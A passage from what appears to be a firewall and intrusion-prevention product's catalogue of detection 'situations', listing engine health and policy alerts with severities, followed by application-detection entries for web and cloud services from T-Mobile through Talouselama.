First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: Filesystem or SWAP usage has grown too big.
Back to top

System_Engine-filesystem-info

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: Filesystems usage ok.
Back to top

System_Engine-filesystem-warning

About this situation: hardware info
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: Filesystem or SWAP usage has grown too big.
Back to top

System_Engine-High-Dynup-Count-Warning

About this situation: High number of dynups used in engine
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Description: The number of dynamic update packages used in the current policies of a master Security Engine is high, which may lead to the engine running out of memory in the inspection subsystem. See the information message for details.
Back to top

System_Engine-hwmon-error

About this situation: hardware error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Hardware monitoring has found a critical problem. Read info field for more.
Back to top

System_Engine-hwmon-info

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Hardware monitoring provided some information. This requires no further actions.
Back to top

System_Engine-hwmon-warning

About this situation: hardware warning
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Hardware monitoring has found a minor problem. Read info field for more.
Back to top

System_Engine-ipmi-error

About this situation: hardware info
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: IPMI system has some serious problems.
Back to top

System_Engine-ipmi-warning

About this situation: hardware info
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: IPMI system has some minor problems.
Back to top

System_Engine-localupgrade-end

About this situation: Local Upgrade ended
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: NGFW local upgrade process ended.
Back to top

System_Engine-localupgrade-fail

About this situation: Local Upgrade process failed.
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: NGFW local upgrade process ended in failure. System reverted to prior situation.
Back to top

System_Engine-localupgrade-reset

About this situation: Local Upgrade process failed.
Context: Engine situations
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: NGFW local upgrade process ended in failure. System could not revert to prior situation. Factory reset required.
Back to top

System_Engine-localupgrade-start

About this situation: Local Upgrade started
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: NGFW local upgrade process started.
Back to top

System_Engine-Log-Auditing-State

About this situation: Auditing logging status
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: This situation is shown only on start and end of auditing functionalities.
Back to top

System_Engine-LOGIN_Event

About this situation: LOGIN Event
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-116-2032
Last changed: sgpkg-ips-131-2032
Description: User has logged into engine. Read info field for more.
Back to top

System_Engine-LOGIN_Failed

About this situation: User LOGIN failed
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-116-2032
Last changed: sgpkg-ips-131-2032
Description: User tried to log in with incorrect username or password. See Information Message column in the Logs view for details.
Back to top

System_Engine-LOGOUT_Event

About this situation: LOGOUT Event
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Description: User has logged out from engine. Read info field for more.
Back to top

System_Engine-modem-error

About this situation: hardware info
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Description: Modem error.
Back to top

System_Engine-modem-info

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: Modem information.
Back to top

System_Engine-modem-warning

About this situation: hardware info
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Description: Modem warning.
Back to top

System_Engine-NIC-Dropped-RX-Packets

About this situation: Indication of packets dropped
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Number of packets dropped by Engine during last minute, indicated by field "Packets Rcvd". This number does not include packets dropped due to specific errors like "bad CRC".
Back to top

System_Engine-nic-error

About this situation: hardware info
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Some network adapter has some major problems.
Back to top

System_Engine-nic-info

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: Network adapters have changed their link status.
Back to top

System_Engine-nic-linkdown

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Description: One or more network adapters' link have gone down.
Back to top

System_Engine-nic-linkup

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Description: One or more network adapters' link have gone up.
Back to top

System_Engine-nic-warning

About this situation: hardware info
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Some network adapter has some minor problems.
Back to top

System_Engine-Power-Supply-Error

About this situation: Power supply error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description: Severe problems detected in one or more power supplies.
Back to top

System_Engine-Power-Supply-Info

About this situation: supply info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: Power supplies are ok.
Back to top

System_Engine-Power-Supply-Warning

About this situation: supply warning
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description: Power supply fault detected.
Back to top

System_Engine-RAID_Event

About this situation: RAID Event
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-98-1314
Last changed: sgpkg-ips-106-2032
Description: RAID array event has occured.
Back to top

System_Engine-RAID_Failed

About this situation: RAID array degraded
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-98-1314
Last changed: sgpkg-ips-106-2032
Description: RAID array degraded.
Back to top

System_Engine-RAID_Info

About this situation: RAID Infp
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: RAID array resync finished.
Back to top

System_Engine-smart-critical

About this situation: hard drive error
Context: Engine situations
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SMART has found a critical harddisk problem.
Back to top

System_Engine-smart-error

About this situation: hard drive error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SMART has found a severe harddisk problem.
Back to top

System_Engine-smart-warning

About this situation: hard drive warning
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SMART has found a minor harddisk problem.
Back to top

System_Engine-temp-error

About this situation: temperature error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: System temperature has exceeded the critical limit.
Back to top

System_Engine-temp-info

About this situation: temperature info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: System temperature is ok.
Back to top

System_Engine-temp-warning

About this situation: temperature warning
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: System temperature has been raised.
Back to top

System_Engine-User_Command

About this situation: User Command
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-601-5211
Description: User has run a command which is shown in the info field.
Back to top

System_Engine-voltage-error

About this situation: voltage error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Some system voltage has exceeded its limits.
Back to top

System_Engine-voltage-info

About this situation: voltage info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: System voltages are ok.
Back to top

System_Engine-voltage-warning

About this situation: voltage warning
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Some system voltage has exceeded its safe limits.
Back to top

System_Engine_Upgrade-Failed

About this situation: System Upgrade Failed
Context: Engine situations
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: System Upgrade failed.
Back to top

System_Engine_Upgrade-Succeeded

About this situation: System Upgrade Succeeded
Context: Engine situations
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: System Upgrade succeeded.
Back to top

System_Inspection-Freeing-Connections

About this situation: Out of inspection memory: dropping connections
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1531-5242
Description: Inspection system has run out of memory. The connection state was freed for some connections. This may degrade the inspection accuracy for these connections and in some cases to make these connections not to work any more.
Back to top

System_Inspection-Freeing-Inspection-Memory

About this situation: Out of inspection memory: freeing application states
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1531-5242
Description: Inspection system has run out of memory. The application protocol state was freed for some connections. This may degrade the inspection accuracy in those connections.
Back to top

System_Inspection-Freeing-IP-Memory

About this situation: Memory low: freeing IP fragment reassembly data
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: Inspection system has run out of memory. Some memory in IP fragment reassembly was freed. This may suggest an IP fragmentation based denial-of-service attack.
Back to top

System_Inspection-Freeing-TCP-Memory

About this situation: Memory low: freeing TCP stream reassembly data
Context: Sensor engine situation
Severity: 1
Tags: NGFW, SSM Informative Messages
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1531-5242
Description: Inspection system has run out of memory. Some memory in TCP stream reassembly was freed. This may reduce the ability of the engine to detect conflicts in the TCP segments and to inspect accurately connections using large TCP window size.
Back to top

System_Inspection-Freeing-Unimportant-Memory

About this situation: Out of inspection memory: freeing less important data
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1531-5242
Description: Inspection system has run out of memory. Some less important memory was deallocated. This does not usually degrade the inspection accuracy.
Back to top

System_IPSEC-VPN-HModule-Failed

About this situation: CSP CryptModule failed
Context: VPN alert
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Description:
Back to top

System_License-Exceeded

About this situation: License limit exceeded
Context: License exceeded
Severity: 10
Tags: License
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: License limit exceeded. More details can be found from the "Information Messsage" field.
Back to top

System_Log-Spool-Corruption

About this situation: Log spool corruption detected
Context: Log spool corruption detected
Severity: 7
Tags: NGFW
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Log spool corruption detected
Back to top

System_Log-Spool-Filling

About this situation: Log spool is becoming full
Context: Log spool is becoming full
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The disk space for the log spool on the engine is running out. Check why the logs are not being transferred to the Log Server.
Back to top

System_Node-Identifier-Conflict

About this situation: Node ID conflict
Context: Node ID conflict
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Two or more nodes with the same identifier are attempting to participate in a cluster. This configuration is not valid. Check your configuration.
Back to top

System_Policy-Applied

About this situation: Applied policy
Context: Policy situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-394-4219
Description: A new policy was successfully applied and is in effect.
Back to top

System_Policy-Apply-Failed

About this situation: Failed to apply policy
Context: Policy situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Applying a new policy failed.
Back to top

System_Policy-Load-Failed

About this situation: Failed to load policy
Context: Policy situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Loading a new policy failed.
Back to top

System_Policy-Loaded

About this situation: Loaded policy
Context: Policy situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-394-4219
Description: A new policy was successfully loaded. An apply is still required to make the policy effective.
Back to top

System_Policy-Reload-Required

About this situation: Sensor starting with a failed configuration, reload required
Context: Policy situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Node is starting with an invalid policy and is not fully functional. A new policy should be loaded as soon as possible. This error may result after upgrading a sensor node if the new sensor version cannot accept the old policy used by the previous sensor version. Re-sending current policy from management server may suffice, or new update packages may be required.
Back to top

System_Primary-Analyzer-Connection

About this situation: Primary analyzer connection in use
Context: Sensor engine situation
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: The primary analyzer connection became available, and the sensor started to use it.
Back to top

System_Sensor-Started

About this situation: Sensor process started at engine node.
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-394-4219
Description: Sensor process was started.
Back to top

System_Stop-Inspection

About this situation: A system helper situation for disabling inspection if needed.
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Description: This is a system situation to identify when inspection can be stopped, depending on configuration.
Back to top

System_Subexpression-Cant-Rewind

About this situation: Subexpression cannot rewind fingerprinting stream
Context: Sensor engine situation
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The DFA launched a subexpression attempted to rewind the fingerprinting stream further back than was possible. This indicates a possible evasion attempt.
Back to top

System_Subexpression-Loop-Iterations-Too-Many

About this situation: Too many loop iterations in a subexpression
Context: Sensor engine situation
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The DFA launched a subexpression which contained too many loop iterations. This indicates a possible unbounded fingerprint test. The subexpression was terminated.
Back to top

System_Subexpression-New-High

About this situation: New high value for concurrent subexpression count for the DFA
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: A new high value for the number of subexpressions was reached for this DFA after the latest policy upload. This situation is for monitoring the concurrent usage of independent subexpressions in DFAs. Note that values higher than 33 are not reported, because the 33rd concurrent independend subexpression is not actually launched.
Back to top

System_Subexpression-Too-Many

About this situation: Too many concurrent subexpressions for the DFA
Context: Sensor engine situation
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The DFA tried to launch too many concurrent independent subexpressions. There is a hard limit of 32 concurrent independent subexpressions; any further independent subexpressions will not be launched until one of the active subexpresions terminates. The DFA is too complex to be fully handled by the engine, some fingerprint matches may be missed in the connection after this situation.
Back to top

System_Syslog-Receive-Socket-Error

About this situation: Syslog receive socket error
Context: Analyzer situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-106-2032
Description: Syslog receive socket error. Syslog receive will not be functional because no listening socket could be created.
Back to top

System_Tester-Debug

About this situation: Tester debug message
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: CP Tester debug situation.
Back to top

System_Tester-Error

About this situation: Tester error.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: An error occurred in the tester.
Back to top

System_Tester-Error-Config

About this situation: Failed to read configuration.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to read configuration.
Back to top

System_Tester-Error-Executecmd

About this situation: Failed to execute a command.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to execute external command or a script.
Back to top

System_Tester-Error-Getcfg

About this situation: Failed to retrieve cluster configuration.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to get configuration information from the cluster protocol.
Back to top

System_Tester-Error-Getstatus

About this situation: Failed to retrieve cluster status.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to get status information from the cluster protocol.
Back to top

System_Tester-Error-Init

About this situation: Tester initialization failed.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to initialize.
Back to top

System_Tester-Error-Kernel-Sock

About this situation: Could not connect to kernel.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to connect to the cluster protocol
Back to top

System_Tester-Error-Setcmd

About this situation: Failed to send command to kernel.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester failed to send a command to the cluster protocol.
Back to top

System_Tester-Error-Toomanyscripts

About this situation: Too many scripts running.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester could not execute a script because there were too many scripts already running.
Back to top

System_Tester-Error-Wait

About this situation: Wait failed.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester wait failed.
Back to top

System_Tester-Exit

About this situation: Tester exit.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester is stopped.
Back to top

System_Tester-Fatal

About this situation: Tester fatal error.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: A fatal error occurred in the tester.
Back to top

System_Tester-Info

About this situation: Tester informational message.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester issued an informational message.
Back to top

System_Tester-Notice

About this situation: Tester notice.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: A notice level message from tester.
Back to top

System_Tester-Signal

About this situation: Received signal.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester received a signal.
Back to top

System_Tester-Start

About this situation: Tester start.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester is started.
Back to top

System_Tester-Test-Failed

About this situation: Test failed
Context: Tester situation
Severity: 8
Tags: NGFW Tester
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-106-2032
Description: A test failed.
Back to top

System_Tester-Warning

About this situation: Tester warning.
Context: Tester situation
Severity: 10
Tags: NGFW Tester
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Tester issued a warning message.
Back to top

System_VE-Deleted

About this situation: Virtual Engine deleted
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: Virtual Engine deleted successfully.
Back to top

System_VPN-Alert

About this situation: VPN alert
Context: VPN alert
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: More active tunnels were detected in a node than can be handled. The last negotiated tunnel cannot be used. The maximum number of tunnels depends on the IPsec parameters (approximately 10,000 to 20,000 tunnels per node).
Back to top

T-Mobile

About this situation: Application T-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: T-Mobile International AG is a holding company for Deutsche Telekom AG's various mobile communications subsidiaries outside Germany.
Back to top

T-Mobile-Cloud

About this situation: Application T-Mobile-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud storage by T-Mobile
Back to top

T-Online-Mail

About this situation: T-Online mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based email service.
Back to top

Tableau

About this situation: Tableau usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-677-5211
Description: Tableau Software produces a family of business intelligent software for data visualization. The products are available at: http://www.tableau.com/products.
Back to top

Tableau-Server-Demo

About this situation: Application Tableau-Server-Demo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tableau Server is a business intelligence application that provides browser-based analytics anyone can use. It's a rapid-fire alternative to the slow pace of traditional business intelligence software.
Back to top

Taboola

About this situation: Taboola usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1769-5242
Description: Taboola provides online advertising for many on news sites.
Back to top

Tactilecrm

About this situation: TactileCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

TADS

About this situation: Application TADS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TADS empowers private schools through innovative products and services for Admissions, Enrollment, Financial Aid, Billing, Tuition and School Management.
Back to top

Tagetik

About this situation: Application Tagetik detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tagetik offers a unified Corporate Performance Management software solution for budgeting, planning, consolidation, monthly close, reporting, analytics.
Back to top

Tagged

About this situation: Tagged usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: Tagged is a social discovery website. Tagged allows members to browse the profiles of other members, play games, and share tags and virtual gifts.
Back to top

Tagoo

About this situation: Tagoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-630-5211
Description: Tagoo (tagoo.ru) is a Russian media search engine.
Back to top

TagWorld

About this situation: Application TagWorld detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TagWorld - Social network
Back to top

Take-the-Interview

About this situation: Application Take-the-Interview detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Take the Interview offers services that allow recruiters and employers to take video responses for their most competitive interview questions.
Back to top

Take-Two Interactive Software

About this situation: Endpoint Context Agent based Take-Two Interactive Software application detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: Take-Two Interactive Software signed endpoint application was detected. Take-Two Interactive Software Inc is a producer of video games.
Back to top

TakingITGlobal

About this situation: Application TakingITGlobal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TakingITGlobal is network of young people learning about, engaging with, and working towards tackling global challenges.
Back to top

Takipi

About this situation: Application Takipi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Takipi employs big data technologies to build solutions that enable developers to debug software and manage cloud downtime.
Back to top

Talent-International

About this situation: Application Talent-International detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Talent International is global ITandT Recruitment and Technology Services specialist supplying thousands of contract and permanent technology professionals across all aspects of the IT, Telco, and Digital sectors.
Back to top

TalentDesk

About this situation: Application TalentDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TalentDesk is a cloud Recruiting Platform that helps companies post Jobs to multiple job boards, manage candidates.
Back to top

TalentHarness

About this situation: Application TalentHarness detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TalentHarness is talent recruitment management application.
Back to top

TalentLMS

About this situation: Application TalentLMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TalentLMS is a SAAS eLearning platform. It is primarily positioned as an employee training tool for small to medium enterprises that places special emphasis on usability and workflow over feature breadth, but can also accommodate larger installations with thousands of registered users.
Back to top

Talentsquare

About this situation: Application Talentsquare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Talentsquare - Applicant Tracking System and Recruiting Software
Back to top

Taleo-Business-Edition

About this situation: Application Taleo-Business-Edition detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oracle Taleo Business Edition solutions empower small to midsize businesses to recruit and retain the brightest and build a lasting culture of performance.
Back to top

TalesRunner

About this situation: TalesRunner usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Games
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-1638-5242
Description: TalesRunner is a multiplayer online game application developed by Rhaon Entertainment.
Back to top

Talisma-Fundraising

About this situation: Application Talisma-Fundraising detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Campus Management Corp.'s mission is to deliver superior technology solutions that enable institutional excellence for higher education institutions and philanthropic non-profit organizations.
Back to top

Talk-City

About this situation: Talk city usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Talkdesk

About this situation: Application Talkdesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Talkdesk is the browser-based call center software.
Back to top

Talkingpoint

About this situation: Application Talkingpoint detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TalkingPoint is a provider the implementation of Speech Recognition technology in the UK within the healthcare, legal, corporate and education industries. With range of integrated Speech Processing Solutions, TalkingPoint provides significant workflow improvements for professionals and their support staff.
Back to top

Tallentflow

About this situation: Application Tallentflow detected
Context: Application Context
Severity: 1
Tags: Web Applications, HR
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tallentflow provides a range of services that include the initial capture of talent
Back to top

Talouselama

About this situation: Talouselama usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
